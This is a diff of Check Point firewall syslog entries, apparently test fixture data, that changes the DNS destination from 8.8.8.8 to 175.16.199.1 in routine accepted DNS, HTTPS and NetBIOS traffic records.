+<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54491"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36397"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58950"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32892"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38206"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56777"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56777"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57808"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506183"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e787,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50592"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34158"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e789,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37020"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e78a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33964"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54217"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38045"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34399"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
